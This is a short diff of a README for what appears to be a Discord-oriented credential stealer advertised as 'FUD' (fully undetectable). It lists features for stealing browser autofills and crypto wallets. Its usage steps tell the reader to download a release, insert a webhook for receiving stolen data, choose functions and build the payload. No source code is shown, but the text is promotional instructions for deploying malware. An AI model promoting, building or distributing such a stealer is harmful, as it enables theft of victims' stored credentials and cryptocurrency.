avatar198/Doofi-stealer-discord-FUD/README.md

 **-✅added autofills steal
 -✅added wallets and crypto wallets steal**
 # Usage
 Download from 'Releases'
-Put in your webhook, select what functions you want to use and click build, thats it.
+Put in your webhook, select what functions you want to use and click *BUILD*